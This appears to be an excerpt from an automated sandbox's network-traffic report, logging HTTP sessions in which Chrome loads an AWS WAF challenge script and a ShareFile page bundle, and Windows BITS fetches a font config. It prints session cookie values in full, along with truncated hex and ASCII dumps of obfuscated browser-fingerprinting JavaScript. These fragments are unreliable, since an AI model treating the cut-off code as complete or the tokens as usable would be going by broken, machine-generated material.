                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                Cookie: AWSALBTG=c1s+nr1v7dakGJOPy9hufhRvmBzI3tzIakbYCc4BJLwJ2kkULT2o+9Nkere7ST4oxsNUu+HSmW7uQovfPXJN+OEdiAlNhGp77mLkbi0OeOU34rmhvotJLausHaJra/B6E3XmL6KCWBxvEkNuj30jHzCTbc7U0GR2tOQKjnyGE1eZ; AWSALBTGCORS=c1s+nr1v7dakGJOPy9hufhRvmBzI3tzIakbYCc4BJLwJ2kkULT2o+9Nkere7ST4oxsNUu+HSmW7uQovfPXJN+OEdiAlNhGp77mLkbi0OeOU34rmhvotJLausHaJra/B6E3XmL6KCWBxvEkNuj30jHzCTbc7U0GR2tOQKjnyGE1eZ; AWSALB=dK1C0GjtASVTA5tLGFNZfnupLnUE7gbaRlsnuyP39sJemVdiw2K+fG0pZvkS5LB+OQ+Kt0WycuPqo8V7IVwoSXcAYo1SOMIDUqGLaPI4v9YNuKLe4G7ahN7i5+hv; AWSALBCORS=dK1C0GjtASVTA5tLGFNZfnupLnUE7gbaRlsnuyP39sJemVdiw2K+fG0pZvkS5LB+OQ+Kt0WycuPqo8V7IVwoSXcAYo1SOMIDUqGLaPI4v9YNuKLe4G7ahN7i5+hv
                                                                                                                                                                                                                                                                                2024-10-09 18:05:07 UTC1419INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:07 GMT
                                                                                                                                                                                                                                                                                Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                Content-Length: 872
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALBTG=QLTdl45Z4cz91kT5blPsbomeD2BQuBoRPvySJTbUekf2djj4k2bYQp1dHmNbGGFUiMjGTUyywcUgazyn+JTUwLNPvpQEKIZD9oCKMuV/9D/rpFQqlN9Wj5J2PuzlCIDKidVzgJPW5HZTQtus/AjTHQRI1Is3jO2onEVXoCBkyrdh; Expires=Wed, 16 Oct 2024 18:05:07 GMT; Path=/
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALBTGCORS=QLTdl45Z4cz91kT5blPsbomeD2BQuBoRPvySJTbUekf2djj4k2bYQp1dHmNbGGFUiMjGTUyywcUgazyn+JTUwLNPvpQEKIZD9oCKMuV/9D/rpFQqlN9Wj5J2PuzlCIDKidVzgJPW5HZTQtus/AjTHQRI1Is3jO2onEVXoCBkyrdh; Expires=Wed, 16 Oct 2024 18:05:07 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALB=O14EaRxtctlvJ/AZjmizBfq3jf937SyamRz27awUXA1wt3w82Qp1b5tF+SGnC2p3JxCfCuHCJlQRLgKTP2Pp1sOlSbM/PxFmvC1Mlv+qkes72yTFALJx26N7r7EW; Expires=Wed, 16 Oct 2024 18:05:07 GMT; Path=/
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALBCORS=O14EaRxtctlvJ/AZjmizBfq3jf937SyamRz27awUXA1wt3w82Qp1b5tF+SGnC2p3JxCfCuHCJlQRLgKTP2Pp1sOlSbM/PxFmvC1Mlv+qkes72yTFALJx26N7r7EW; Expires=Wed, 16 Oct 2024 18:05:07 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Cache-Control: no-store, must-revalidate, no-cache, private
                                                                                                                                                                                                                                                                                Content-Language: en
                                                                                                                                                                                                                                                                                ETag: "1db18773a8c2468"
                                                                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                                                                Last-Modified: Mon, 07 Oct 2024 05:10:30 GMT
                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                X-XSS-Protection: 1;mode=block
                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=16000000;includeSubDomains;preload
                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                2024-10-09 18:05:07 UTC872INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 0a 09 77 69 64 74 68 3d 22 31 65 6d 22 0a 09 68 65 69 67 68 74 3d 22 31 65 6d 22 0a 09 66 69 6c 6c 3d 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 0a 09 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 30 38 20 32 34 30 22 0a 09 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 0a 3e 0a 09 3c 70 61 74 68 20 64 3d 22 4d 39 38 2e 37 35 37 37 20 31 36 32 2e 39 38 34 4c 36 36 2e 36 39 37 31 20 32 31 38 2e 35 31 34 4c 35 33 2e 36 34 39 31 20 32 31 30 2e 39 37 33 4c 35 31 2e 39 37 31 35 20 32 31 30 2e 30 30 37 4c 36 39 2e 32 38 39 37 20 31 38 30 2e 30 31 34 48 30 56 31 36 32 2e 39 38 34 48 39
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svgwidth="1em"height="1em"fill="currentColor"viewBox="0 0 208 240"xmlns="http://www.w3.org/2000/svg"><path d="M98.7577 162.984L66.6971 218.514L53.6491 210.973L51.9715 210.007L69.2897 180.014H0V162.984H9


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                9192.168.2.6497262.19.74.158443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:08 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                Host: fs.microsoft.com
                                                                                                                                                                                                                                                                                2024-10-09 18:05:08 UTC467INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                Server: ECAcc (lpl/EF67)
                                                                                                                                                                                                                                                                                X-CID: 11
                                                                                                                                                                                                                                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                                X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=254434
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:08 GMT
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                X-CID: 2


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                10192.168.2.6497282.19.74.158443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:10 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                Range: bytes=0-2147483646
                                                                                                                                                                                                                                                                                User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                Host: fs.microsoft.com
                                                                                                                                                                                                                                                                                2024-10-09 18:05:10 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                ApiVersion: Distribute 1.1
                                                                                                                                                                                                                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                                                                                X-CID: 11
                                                                                                                                                                                                                                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                                X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=254337
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:10 GMT
                                                                                                                                                                                                                                                                                Content-Length: 55
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                X-CID: 2
                                                                                                                                                                                                                                                                                2024-10-09 18:05:10 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                                                                                Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                11192.168.2.64972918.173.205.424432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:10 UTC410OUTGET /0093b71e39a6/478ed03bbf12/challenge.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.com
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:10 UTC596INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: text/javascript
                                                                                                                                                                                                                                                                                Content-Length: 1096693
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:10 GMT
                                                                                                                                                                                                                                                                                cache-control: private, max-age=86400, stale-while-revalidate=604800
                                                                                                                                                                                                                                                                                last-modified: Wed, 9 Oct 2024 18:05:10 +0000
                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                expires: 0
                                                                                                                                                                                                                                                                                x-amzn-waf-challenge-id: Root=1-6706c5d6-41e74b7c05b1d247282d5000
                                                                                                                                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 daf01c71790f42e645ae4024c607941e.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA56-P12
                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: nh1TifEKg0wWJLHzczapFBFUHIKPhsko8Kcnere8yxRpjFDsWTas3Q==
                                                                                                                                                                                                                                                                                2024-10-09 18:05:10 UTC15788INData Raw: 76 61 72 20 61 30 5f 30 78 32 66 38 37 3d 5b 27 6e 6f 6e 52 65 70 75 64 69 61 74 69 6f 6e 27 2c 27 50 55 42 4c 49 43 5c 78 32 30 4b 45 59 27 2c 27 6b 65 79 27 2c 27 65 6e 63 72 79 70 74 69 6f 6e 50 61 72 61 6d 73 27 2c 27 31 56 68 4f 52 54 4b 27 2c 27 32 34 38 37 32 69 63 63 59 6e 71 27 2c 27 43 6f 6d 6d 65 6e 74 3a 5c 78 32 30 27 2c 27 74 6f 74 61 6c 46 6f 63 75 73 54 69 6d 65 27 2c 27 63 6c 6f 73 65 5f 6e 6f 74 69 66 79 27 2c 27 63 72 63 43 61 6c 63 75 6c 61 74 6f 72 27 2c 27 67 65 74 43 69 70 68 65 72 53 75 69 74 65 27 2c 27 44 6f 4e 6f 74 54 72 61 63 6b 43 6f 6c 6c 65 63 74 6f 72 27 2c 27 66 69 72 73 74 43 68 69 6c 64 27 2c 27 43 6f 75 6c 64 5c 78 32 30 6e 6f 74 5c 78 32 30 61 64 64 5c 78 32 30 50 4b 43 53 23 37 5c 78 32 30 73 69 67 6e 65 72 3b 5c 78
                                                                                                                                                                                                                                                                                Data Ascii: var a0_0x2f87=['nonRepudiation','PUBLIC\x20KEY','key','encryptionParams','1VhORTK','24872iccYnq','Comment:\x20','totalFocusTime','close_notify','crcCalculator','getCipherSuite','DoNotTrackCollector','firstChild','Could\x20not\x20add\x20PKCS#7\x20signer;\x
                                                                                                                                                                                                                                                                                2024-10-09 18:05:10 UTC16384INData Raw: 45 6c 65 6d 65 6e 74 54 65 6c 65 6d 65 74 72 79 43 6f 6c 6c 65 63 74 6f 72 27 2c 27 43 65 72 74 69 66 69 63 61 74 65 2e 54 42 53 43 65 72 74 69 66 69 63 61 74 65 2e 73 69 67 6e 61 74 75 72 65 2e 70 61 72 61 6d 65 74 65 72 73 27 2c 27 70 61 72 61 6d 65 74 65 72 73 27 2c 27 6d 6f 64 65 73 27 2c 27 31 34 39 36 69 6b 6e 6e 65 56 27 2c 27 4d 79 72 69 61 64 5c 78 32 30 48 65 62 72 65 77 27 2c 27 53 69 67 6e 65 72 49 6e 66 6f 2e 64 69 67 65 73 74 41 6c 67 6f 72 69 74 68 6d 2e 61 6c 67 6f 72 69 74 68 6d 27 2c 27 63 6f 6c 6f 72 3a 5c 78 32 30 79 65 6c 6c 6f 77 27 2c 27 66 6c 61 73 68 27 2c 27 6d 65 73 73 61 67 65 4c 65 6e 67 74 68 36 34 27 2c 27 73 68 61 31 27 2c 27 73 69 67 6e 65 72 49 6e 66 6f 73 27 2c 27 32 2e 35 2e 32 39 2e 32 30 27 2c 27 54 4c 53 5f 31 5f 30
                                                                                                                                                                                                                                                                                Data Ascii: ElementTelemetryCollector','Certificate.TBSCertificate.signature.parameters','parameters','modes','1496iknneV','Myriad\x20Hebrew','SignerInfo.digestAlgorithm.algorithm','color:\x20yellow','flash','messageLength64','sha1','signerInfos','2.5.29.20','TLS_1_0
                                                                                                                                                                                                                                                                                2024-10-09 18:05:10 UTC1784INData Raw: 6e 74 52 65 63 74 27 2c 27 44 4f 43 55 4d 45 4e 54 5f 49 4e 54 45 52 41 43 54 49 4f 4e 5f 45 56 45 4e 54 53 27 2c 27 56 69 6e 65 72 5c 78 32 30 48 61 6e 64 5c 78 32 30 49 54 43 27 2c 27 70 75 62 6c 69 63 4b 65 79 54 6f 52 53 41 50 75 62 6c 69 63 4b 65 79 27 2c 27 75 6e 64 65 66 69 6e 65 64 27 2c 27 65 6e 74 72 69 65 73 27 2c 27 6d 6f 64 50 6f 77 49 6e 74 27 2c 27 61 64 64 43 65 72 74 69 66 69 63 61 74 65 27 2c 27 34 34 33 33 32 35 55 65 49 64 41 59 27 2c 27 41 6c 65 78 61 6e 64 72 61 5c 78 32 30 53 63 72 69 70 74 27 2c 27 75 73 65 72 69 6e 66 6f 57 69 74 68 41 74 27 2c 27 73 68 61 35 31 32 2d 32 32 34 27 2c 27 6b 64 66 49 74 65 72 61 74 69 6f 6e 43 6f 75 6e 74 27 2c 27 31 4a 69 56 58 6d 45 27 2c 27 65 6e 63 72 79 70 74 65 64 43 6f 6e 74 65 6e 74 27 2c 27
                                                                                                                                                                                                                                                                                Data Ascii: ntRect','DOCUMENT_INTERACTION_EVENTS','Viner\x20Hand\x20ITC','publicKeyToRSAPublicKey','undefined','entries','modPowInt','addCertificate','443325UeIdAY','Alexandra\x20Script','userinfoWithAt','sha512-224','kdfIterationCount','1JiVXmE','encryptedContent','
                                                                                                                                                                                                                                                                                2024-10-09 18:05:10 UTC16384INData Raw: 74 68 73 27 2c 27 6d 6f 75 73 65 43 79 63 6c 65 73 27 2c 27 63 65 72 74 69 66 69 63 61 74 65 5f 72 65 71 75 65 73 74 27 2c 27 43 48 41 4c 4c 45 4e 47 45 5f 50 52 45 46 49 58 5f 4f 56 45 52 52 49 44 45 27 2c 27 73 75 62 6a 65 63 74 50 75 62 6c 69 63 4b 65 79 49 6e 66 6f 27 2c 27 53 65 67 6f 65 5c 78 32 30 55 49 5c 78 32 30 53 65 6d 69 6c 69 67 68 74 27 2c 27 32 2e 35 2e 32 39 2e 35 34 27 2c 27 50 72 6f 78 79 5c 78 32 30 33 27 2c 27 70 6f 6c 69 63 79 4d 61 70 70 69 6e 67 27 2c 27 31 30 31 30 27 2c 27 73 65 72 76 65 72 5f 6e 61 6d 65 27 2c 27 65 6e 63 41 6c 67 6f 72 69 74 68 6d 27 2c 27 69 6e 76 61 6c 69 64 5c 78 32 30 73 74 72 69 6e 67 27 2c 27 44 61 74 61 42 75 66 66 65 72 27 2c 27 50 42 45 53 32 41 6c 67 6f 72 69 74 68 6d 73 27 2c 27 50 72 6f 78 79 5c 78
                                                                                                                                                                                                                                                                                Data Ascii: ths','mouseCycles','certificate_request','CHALLENGE_PREFIX_OVERRIDE','subjectPublicKeyInfo','Segoe\x20UI\x20Semilight','2.5.29.54','Proxy\x203','policyMapping','1010','server_name','encAlgorithm','invalid\x20string','DataBuffer','PBES2Algorithms','Proxy\x
                                                                                                                                                                                                                                                                                2024-10-09 18:05:10 UTC16384INData Raw: 3d 5c 78 32 32 70 61 73 73 77 6f 72 64 5c 78 32 32 5d 27 2c 27 68 69 73 74 6f 72 79 27 2c 27 4d 79 72 69 61 64 5c 78 32 30 50 72 6f 27 2c 27 63 61 74 63 68 27 2c 27 4c 65 66 74 6d 6f 73 74 5c 78 32 30 6f 63 74 65 74 73 5c 78 32 30 6e 6f 74 5c 78 32 30 7a 65 72 6f 5c 78 32 30 61 73 5c 78 32 30 65 78 70 65 63 74 65 64 27 2c 27 73 6f 72 74 27 2c 27 61 77 73 2d 77 61 66 2d 74 6f 6b 65 6e 3d 27 2c 27 6d 65 6d 6f 72 79 27 2c 27 62 79 74 65 73 54 6f 49 50 27 2c 27 67 65 74 50 61 72 61 6d 65 74 65 72 27 2c 27 33 44 45 53 2d 45 43 42 27 2c 27 4b 6f 7a 75 6b 61 5c 78 32 30 47 6f 74 68 69 63 5c 78 32 30 50 72 6f 5c 78 32 30 48 27 2c 27 41 45 53 2d 31 32 38 2d 43 42 43 27 2c 27 42 6f 64 6f 6e 69 5c 78 32 30 4d 54 5c 78 32 30 50 6f 73 74 65 72 5c 78 32 30 43 6f 6d 70
                                                                                                                                                                                                                                                                                Data Ascii: =\x22password\x22]','history','Myriad\x20Pro','catch','Leftmost\x20octets\x20not\x20zero\x20as\x20expected','sort','aws-waf-token=','memory','bytesToIP','getParameter','3DES-ECB','Kozuka\x20Gothic\x20Pro\x20H','AES-128-CBC','Bodoni\x20MT\x20Poster\x20Comp
                                                                                                                                                                                                                                                                                2024-10-09 18:05:10 UTC16384INData Raw: 39 63 32 3d 30 78 30 3b 66 6f 72 28 5f 30 78 35 39 65 30 61 63 3d 4f 62 6a 65 63 74 5b 5f 30 78 33 31 63 61 62 35 28 30 78 37 62 35 29 5d 28 5f 30 78 65 32 65 36 36 29 3b 5f 30 78 35 38 32 39 63 32 3c 5f 30 78 35 39 65 30 61 63 5b 5f 30 78 33 31 63 61 62 35 28 30 78 62 30 39 29 5d 3b 5f 30 78 35 38 32 39 63 32 2b 2b 29 5f 30 78 33 36 63 31 62 30 5b 5f 30 78 33 31 63 61 62 35 28 30 78 34 61 30 29 5d 28 5f 30 78 35 39 65 30 61 63 5b 5f 30 78 35 38 32 39 63 32 5d 29 3c 30 78 30 26 26 4f 62 6a 65 63 74 5b 27 70 72 6f 74 6f 74 79 70 65 27 5d 5b 5f 30 78 33 31 63 61 62 35 28 30 78 33 38 34 29 5d 5b 27 63 61 6c 6c 27 5d 28 5f 30 78 65 32 65 36 36 2c 5f 30 78 35 39 65 30 61 63 5b 5f 30 78 35 38 32 39 63 32 5d 29 26 26 28 5f 30 78 35 64 62 65 37 5b 5f 30 78 35 39
                                                                                                                                                                                                                                                                                Data Ascii: 9c2=0x0;for(_0x59e0ac=Object[_0x31cab5(0x7b5)](_0xe2e66);_0x5829c2<_0x59e0ac[_0x31cab5(0xb09)];_0x5829c2++)_0x36c1b0[_0x31cab5(0x4a0)](_0x59e0ac[_0x5829c2])<0x0&&Object['prototype'][_0x31cab5(0x384)]['call'](_0xe2e66,_0x59e0ac[_0x5829c2])&&(_0x5dbe7[_0x59
                                                                                                                                                                                                                                                                                2024-10-09 18:05:10 UTC6056INData Raw: 34 39 29 2c 5f 30 78 33 37 34 39 35 64 28 30 78 31 33 63 29 2c 27 63 68 61 72 43 6f 64 65 41 74 27 2c 30 78 66 66 66 66 66 66 66 66 2c 30 78 66 66 2c 5f 30 78 33 37 34 39 35 64 28 30 78 62 30 39 29 5d 3b 74 68 69 73 5b 5f 30 78 35 32 38 35 38 31 5b 30 78 33 5d 5d 7c 7c 74 68 69 73 5b 5f 30 78 35 32 38 35 38 31 5b 30 78 32 5d 5d 28 29 3b 76 61 72 20 5f 30 78 33 32 36 66 33 65 2c 5f 30 78 35 32 38 30 37 32 3d 5f 30 78 35 32 38 35 38 31 5b 30 78 30 5d 3b 5f 30 78 35 32 38 30 37 32 5e 3d 5f 30 78 35 32 38 35 38 31 5b 30 78 35 5d 3b 66 6f 72 28 76 61 72 20 5f 30 78 33 31 38 32 66 63 3d 5f 30 78 35 32 38 35 38 31 5b 30 78 30 5d 3b 5f 30 78 33 31 38 32 66 63 3c 5f 30 78 35 37 62 36 34 61 5b 5f 30 78 35 32 38 35 38 31 5b 30 78 37 5d 5d 3b 5f 30 78 33 31 38 32 66
                                                                                                                                                                                                                                                                                Data Ascii: 49),_0x37495d(0x13c),'charCodeAt',0xffffffff,0xff,_0x37495d(0xb09)];this[_0x528581[0x3]]||this[_0x528581[0x2]]();var _0x326f3e,_0x528072=_0x528581[0x0];_0x528072^=_0x528581[0x5];for(var _0x3182fc=_0x528581[0x0];_0x3182fc<_0x57b64a[_0x528581[0x7]];_0x3182f
                                                                                                                                                                                                                                                                                2024-10-09 18:05:10 UTC16384INData Raw: 30 78 31 61 5d 2b 5f 30 78 33 36 37 34 32 36 5b 5f 30 78 34 35 34 32 31 37 5d 5b 5f 30 78 34 33 39 37 32 30 5b 30 78 35 5d 5d 28 29 3b 7d 66 6f 72 28 5f 30 78 66 33 61 31 62 65 5b 5f 30 78 34 33 39 37 32 30 5b 30 78 31 31 5d 5d 5b 5f 30 78 34 33 39 37 32 30 5b 30 78 31 63 5d 5d 3d 5f 30 78 33 36 37 34 32 36 5b 5f 30 78 34 33 39 37 32 30 5b 30 78 33 5d 5d 28 5f 30 78 34 33 39 37 32 30 5b 30 78 61 5d 29 2b 5f 30 78 34 33 39 37 32 30 5b 30 78 31 32 5d 2c 77 69 6e 64 6f 77 5b 5f 30 78 34 33 39 37 32 30 5b 30 78 31 36 5d 5d 28 5f 30 78 34 33 39 37 32 30 5b 30 78 31 33 5d 2c 5f 30 78 34 33 39 37 32 30 5b 30 78 31 33 5d 29 2c 5f 30 78 66 33 61 31 62 65 5b 5f 30 78 34 33 39 37 32 30 5b 30 78 37 5d 5d 5b 5f 30 78 34 33 39 37 32 30 5b 30 78 31 39 5d 5d 28 5f 30 78
                                                                                                                                                                                                                                                                                Data Ascii: 0x1a]+_0x367426[_0x454217][_0x439720[0x5]]();}for(_0xf3a1be[_0x439720[0x11]][_0x439720[0x1c]]=_0x367426[_0x439720[0x3]](_0x439720[0xa])+_0x439720[0x12],window[_0x439720[0x16]](_0x439720[0x13],_0x439720[0x13]),_0xf3a1be[_0x439720[0x7]][_0x439720[0x19]](_0x
                                                                                                                                                                                                                                                                                2024-10-09 18:05:10 UTC1514INData Raw: 61 30 31 62 61 3d 5b 2f 28 5b 30 2d 39 2e 5d 2b 29 5c 73 2b 72 28 5b 30 2d 39 2e 5d 2b 29 2f 2c 5f 30 78 32 66 62 63 37 62 28 30 78 33 34 36 29 2c 5f 30 78 32 66 62 63 37 62 28 30 78 39 64 32 29 2c 27 5c 78 32 30 27 2c 27 70 6c 75 67 69 6e 73 27 2c 27 2e 27 2c 5f 30 78 32 66 62 63 37 62 28 30 78 61 63 64 29 2c 6e 75 6c 6c 2c 5f 30 78 32 66 62 63 37 62 28 30 78 31 36 36 29 2c 5f 30 78 32 66 62 63 37 62 28 30 78 35 66 39 29 2c 5f 30 78 32 66 62 63 37 62 28 30 78 63 38 65 29 2c 2f 53 68 6f 63 6b 77 61 76 65 20 46 6c 61 73 68 2f 2c 2f 5b 5e 30 2d 39 5d 2f 67 2c 30 78 31 2c 30 78 30 2c 5f 30 78 32 66 62 63 37 62 28 30 78 31 31 33 29 2c 5f 30 78 32 66 62 63 37 62 28 30 78 62 30 39 29 2c 30 78 32 2c 5f 30 78 32 66 62 63 37 62 28 30 78 37 64 37 29 5d 3b 66 6f 72
                                                                                                                                                                                                                                                                                Data Ascii: a01ba=[/([0-9.]+)\s+r([0-9.]+)/,_0x2fbc7b(0x346),_0x2fbc7b(0x9d2),'\x20','plugins','.',_0x2fbc7b(0xacd),null,_0x2fbc7b(0x166),_0x2fbc7b(0x5f9),_0x2fbc7b(0xc8e),/Shockwave Flash/,/[^0-9]/g,0x1,0x0,_0x2fbc7b(0x113),_0x2fbc7b(0xb09),0x2,_0x2fbc7b(0x7d7)];for
                                                                                                                                                                                                                                                                                2024-10-09 18:05:10 UTC16384INData Raw: 33 64 39 28 30 78 39 63 34 29 2c 5f 30 78 31 65 62 33 64 39 28 30 78 37 64 37 29 5d 3b 72 65 74 75 72 6e 21 21 77 69 6e 64 6f 77 5b 5f 30 78 33 61 34 62 30 32 5b 30 78 31 5d 5d 5b 5f 30 78 33 61 34 62 30 32 5b 30 78 32 5d 5d 5b 5f 30 78 33 61 34 62 30 32 5b 30 78 33 5d 5d 28 5f 30 78 33 61 34 62 30 32 5b 30 78 30 5d 29 3b 7d 2c 5f 30 78 37 62 34 37 61 37 5b 5f 30 78 34 63 62 64 30 30 5b 30 78 31 5d 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78 31 38 66 34 63 36 3d 5f 30 78 33 32 62 62 33 30 2c 5f 30 78 33 65 61 65 35 62 3d 5b 5f 30 78 31 38 66 34 63 36 28 30 78 39 63 34 29 2c 5f 30 78 31 38 66 34 63 36 28 30 78 37 64 37 29 2c 2f 57 69 6e 64 6f 77 73 2f 69 2c 5f 30 78 31 38 66 34 63 36 28 30 78 31 31 33 29 5d 3b 72 65 74 75 72 6e 21 21 77 69
                                                                                                                                                                                                                                                                                Data Ascii: 3d9(0x9c4),_0x1eb3d9(0x7d7)];return!!window[_0x3a4b02[0x1]][_0x3a4b02[0x2]][_0x3a4b02[0x3]](_0x3a4b02[0x0]);},_0x7b47a7[_0x4cbd00[0x1]]=function(){var _0x18f4c6=_0x32bb30,_0x3eae5b=[_0x18f4c6(0x9c4),_0x18f4c6(0x7d7),/Windows/i,_0x18f4c6(0x113)];return!!wi


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                12192.168.2.64973076.223.1.1664432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:10 UTC1032OUTGET /bundles/index.563cd3fc21b70465916a.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
